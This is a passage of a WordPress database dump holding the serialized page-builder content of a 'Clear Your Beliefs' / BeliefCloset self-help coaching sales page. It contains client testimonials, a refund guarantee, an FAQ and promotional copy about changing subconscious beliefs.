www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1608, 2044, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62337:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<div class="parg-text"><p><strong>When 